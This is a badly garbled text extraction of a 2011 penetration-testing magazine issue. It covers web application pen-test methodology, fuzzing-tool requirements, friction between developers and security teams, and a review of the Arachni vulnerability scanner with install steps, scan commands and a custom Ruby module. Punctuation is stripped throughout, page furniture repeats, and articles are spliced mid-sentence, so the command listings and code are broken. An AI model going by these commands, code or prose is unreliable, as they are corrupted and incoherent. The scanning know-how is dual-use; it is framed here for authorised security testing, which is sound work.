to address 100 of all the technical vulnerabilities there is no reason to believe that such tools will achieve such goal in the near future Current problems facing the web application tools are the following client-side generated URLs required JavaScript functions application logout transaction-based systems requiring specific user paths automated form submission one time passwords and Infinite web sites with random URL-based session IDs
Logical VulnerabilitiesWhere such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done While both an automated scanning tool and skilled penetration tester can navigate through a web application only the latter is able to understand what the logic behind specific workflow or how the application works in general Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed For instance an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application where point B represents a security validation check A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C and bypassing the security validation exists at point B
History has proven that software bugs defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities where it can lead to unauthorized access to the systems networks and application information It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (ie attacks using the HTTPHTTPS protocol) In such attacks traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications
Security analyses review the critical components of a web-based portal e-commerce application or web services platform Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented back-end database or web server used by the application
Itrsquos imperative to point out that the web application penetration assessments should be designed based upon defined threat-model It should also be based upon the evaluation of the integration between components (eg third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities
Figure 1 The different activities of the Pen Testing processes
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
